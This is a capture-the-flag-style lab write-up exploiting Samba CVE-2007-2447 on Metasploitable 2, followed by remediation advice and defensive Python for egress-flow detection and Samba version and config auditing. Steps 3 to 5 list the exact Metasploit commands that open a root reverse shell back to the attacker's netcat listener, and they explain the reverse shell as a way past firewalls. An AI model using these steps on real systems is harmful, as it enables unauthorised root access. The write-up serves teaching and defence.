Introduction
Samba is a service that implements the SMB (Server Message Block) protocol, used for file sharing and printer access across a network. CVE-2007-2447 is a remote code execution vulnerability caused by unsanitized input in Samba's username map script feature. An attacker can inject malicious commands through a crafted username, which are executed at shell level — giving root access directly.
Lab Setup
Attacker: Kali Linux (192.168.254.128)
Target: Metasploitable 2 (192.168.254.129)
Methodology: Reconnaissance → Enumeration → Vulnerability Identification → Exploitation → Post-Exploitation
Step 1: Scanning & Enumeration
nmap -sS -sV -n -Pn -T4 --top-ports=100 192.168.254.129
I used -sS (a SYN scan, which needs root and is quieter than a full connect scan) to stay stealthy, -sV to detect service versions so I could research vulnerabilities, -n to skip reverse DNS lookups, -Pn to skip host discovery since I already knew the target was up, and -T4 to speed things up; --top-ports=100 limits the scan to the 100 most common ports. The goal was to map the attack surface as quietly and efficiently as possible.
Key findings:
- Ports 139/tcp and 445/tcp open
- Service: Samba smbd version 3.0.20

Step 2: Vulnerability Identification
searchsploit samba 3.0.20
I used searchsploit — an offline terminal tool that searches the Exploit-DB database locally — so I could quickly find known exploits without needing internet access. Think of it as the intelligence report. It told me the vulnerability existed. Now I needed the weapon to exploit it.
Result: CVE-2007-2447 — username map script command execution. Unsanitized input in Samba's username map script allows an attacker to inject malicious commands through a crafted username and execute them remotely.

Step 3: Exploitation
Where searchsploit is the intelligence report — Metasploit is the toolkit.
msfconsole

search samba usermap
I searched for samba usermap because that keyword came directly from the searchsploit result. One module came back ranked excellent — stable and reliable.

use exploit/multi/samba/usermap_script
show options
Metasploit automatically selected cmd/unix/reverse_netcat as the payload. Netcat sits on my machine listening on port 4444, waiting to catch the shell when the target connects back.
set RHOSTS 192.168.254.129
set LHOST 192.168.254.128
- RHOSTS — the target
- LHOST — my machine, where the reverse shell lands

Why reverse shell? Firewalls block incoming connections — but outgoing ones are usually allowed. So instead of me connecting to the target, I make the target connect to me. Firewall bypass, built in.
Port 139 was targeted because both machines are on the same local network — SMB over NetBIOS.
run

Step 4: Gaining Access
Command shell session 1 opened
192.168.254.128:4444 → 192.168.254.129:32901
The exploit fired. The target connected back to my machine on port 4444 exactly as expected: the session line pairs my listener on 4444 with the target's ephemeral source port 32901, which is the target reaching back to me, not the other way around.
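Seen from the target's side, that session line records a file server opening an outbound TCP connection to port 4444 on another host, which is the opposite of what a file server is supposed to do, and it is exactly the "outgoing is usually allowed" assumption from Step 3 that an egress policy takes away. The following Python is added here as an example and is not part of the original lab: it applies a simple egress allow-list to a handful of constructed flow records (a simplified "initiator -> responder" format made up for this example, not any real tool's log) and flags the flows in which the server is the initiator and the destination is not on its allow-list. The server address and the allow-list are assumptions for the example.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    ts: str
    proto: str
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int


# Constructed record format: "<timestamp> <TCP|UDP> <initiator ip:port> -> <responder ip:port>"
_FLOW_RE = re.compile(
    r"^(\S+)\s+(TCP|UDP)\s+(\d{1,3}(?:\.\d{1,3}){3}):(\d+)\s*->\s*(\d{1,3}(?:\.\d{1,3}){3}):(\d+)$"
)


def parse_flow(line):
    """Parse one constructed flow record; returns None for lines that do not match."""
    m = _FLOW_RE.match(line.strip())
    if m is None:
        return None
    ts, proto, sip, sport, dip, dport = m.groups()
    return Flow(ts, proto, sip, int(sport), dip, int(dport))


# Assumed egress policy for the file server: it answers on SMB (139/445) and only
# ever *initiates* DNS, NTP and HTTP(S) for updates. Anything else it starts is suspect.
SERVER_IP = "192.168.254.129"
ALLOWED_EGRESS = {("UDP", 53), ("UDP", 123), ("TCP", 80), ("TCP", 443)}


def unexpected_egress(lines, server_ip=SERVER_IP, allowed=ALLOWED_EGRESS):
    """Return the flows where the server is the initiator and the destination is off the allow-list."""
    hits = []
    for line in lines:
        flow = parse_flow(line)
        if flow is None or flow.src_ip != server_ip:
            continue  # unparsable, or the server is the responder (normal for a file server)
        if (flow.proto, flow.dst_port) not in allowed:
            hits.append(flow)
    return hits


# Constructed sample. The third record is what the Step 4 session line looks like from the
# network's point of view: the target is the initiator and 32901 is its source port.
SAMPLE_FLOWS = [
    "2024-05-01T12:00:01Z TCP 192.168.254.128:50112 -> 192.168.254.129:139",
    "2024-05-01T12:00:02Z UDP 192.168.254.129:41234 -> 192.168.254.1:53",
    "2024-05-01T12:00:03Z TCP 192.168.254.129:32901 -> 192.168.254.128:4444",
    "2024-05-01T12:00:04Z TCP 192.168.254.129:45000 -> 10.0.0.5:443",
    "garbage line that should be ignored",
]

if __name__ == "__main__":
    for flow in unexpected_egress(SAMPLE_FLOWS):
        print(f"ALERT {flow.ts}: {flow.src_ip}:{flow.src_port} -> {flow.dst_ip}:{flow.dst_port} ({flow.proto})")
```

Run as-is it prints a single alert for the connection to 4444. The same allow-list is what a default-deny OUTPUT chain on the server, or an egress rule on the segment firewall, would enforce; the alert is the detection side of that control, and both exist precisely because servers have no business initiating connections to workstations.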

Step 5: Post-Exploitation
whoami → root
id → uid=0(root) gid=0(root)
uname -a → Linux metasploitable 2.6.24-16-server
I ran these three commands to confirm what level of access I had. I expected to need privilege escalation — but I didn't. Samba was running as root on the target system, so exploitation gave me the highest level of access immediately. No extra steps needed.
That's what makes unpatched services so dangerous. It's not just about getting in — it's about what's waiting for you when you do.
Remediation
- Update Samba to the latest version
- Disable the username map script feature if not required
- Restrict SMB ports 139 and 445 via firewall
- Disable NetBIOS if not needed on the network
- Never run services as root unless absolutely necessary
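Two of the points above, the version check from Step 1 and the configuration items in this list, can be scripted. The following Python is added here as an example and is not code from the original lab: it decides whether a Samba banner like the one Nmap reported ("Samba smbd 3.0.20") falls inside the range affected by CVE-2007-2447 (3.0.0 up to and including 3.0.25rc3; the fix shipped in 3.0.25), and it audits a minimal smb.conf against the remediation list. The smb.conf reader is deliberately minimal (no include handling or variable substitution), and both config texts, the subnet in them and the script path are constructed for the example.

```python
import re

# CVE-2007-2447 affects Samba 3.0.0 through 3.0.25rc3; the final 3.0.25 release contains the fix.
AFFECTED_MIN = (3, 0, 0)
FIXED = (3, 0, 25)

_VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)([a-z]+\d*)?")


def parse_samba_version(banner):
    """Pull (major, minor, patch, prerelease) out of a banner such as 'Samba smbd 3.0.20-Debian'."""
    m = _VERSION_RE.search(banner)
    if m is None:
        return None
    major, minor, patch = (int(x) for x in m.group(1, 2, 3))
    return major, minor, patch, (m.group(4) or "")


def is_affected_by_cve_2007_2447(banner):
    """True when the banner's version is inside the affected range."""
    parsed = parse_samba_version(banner)
    if parsed is None:
        return False  # unknown version (e.g. Nmap's '3.X - 4.X'): report separately rather than guess
    version, prerelease = parsed[:3], parsed[3]
    if AFFECTED_MIN <= version < FIXED:
        return True
    # 3.0.25rc1..rc3 still carry the bug; plain 3.0.25 does not.
    return version == FIXED and prerelease.startswith("rc")


def parse_smb_conf(text):
    """Minimal smb.conf reader: {section: {key: value}} with keys lowercased and whitespace collapsed."""
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        sections[current][" ".join(key.split()).lower()] = value.strip()
    return sections


def audit_smb_conf(text):
    """Return findings for the [global] settings the remediation list calls out."""
    g = parse_smb_conf(text).get("global", {})
    findings = []
    if "username map script" in g:
        findings.append("username map script is set: remove it unless it is genuinely required")
    # Samba listens on 445 and 139 unless 'smb ports' narrows it.
    if "139" in g.get("smb ports", "445 139").split():
        findings.append("smbd listens on 139: set 'smb ports = 445' if NetBIOS is not needed")
    if g.get("disable netbios", "no").lower() not in ("yes", "true", "1"):
        findings.append("NetBIOS is enabled: set 'disable netbios = yes' if not needed")
    if "hosts allow" not in g:
        findings.append("no 'hosts allow': restrict SMB to the subnets that need it")
    return findings


# Constructed configs for the example; the script path is a placeholder, not a real file.
WEAK_CONF = """
[global]
   workgroup = WORKGROUP
   username map script = /usr/local/bin/mapuser.sh
[tmp]
   path = /tmp
   writable = yes
"""

HARDENED_CONF = """
[global]
   workgroup = WORKGROUP
   smb ports = 445
   disable netbios = yes
   hosts allow = 192.168.254.0/24
   ; username map script removed
[tmp]
   path = /tmp
   writable = no
"""

if __name__ == "__main__":
    print("3.0.20 affected:", is_affected_by_cve_2007_2447("Samba smbd 3.0.20-Debian"))
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_smb_conf(conf) or ["no findings"])
```

The weak config produces four findings and the hardened one none. Removing username map script closes this particular hole even before the upgrade lands, but the version check is the one that matters for the patch cycle: 3.0.x builds with a vendor suffix still resolve to their upstream patch level, and a banner Nmap could not pin down is reported as unknown rather than as safe.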
Conclusion
This lab shows the full attack chain — from a simple Nmap scan revealing an open port, to searchsploit identifying a known CVE, to Metasploit delivering a root shell. The scary part isn't the exploit itself — it's how fast it happens on an unpatched system. One open port. One outdated version. Full root access in minutes.
Author: Ume-Habiba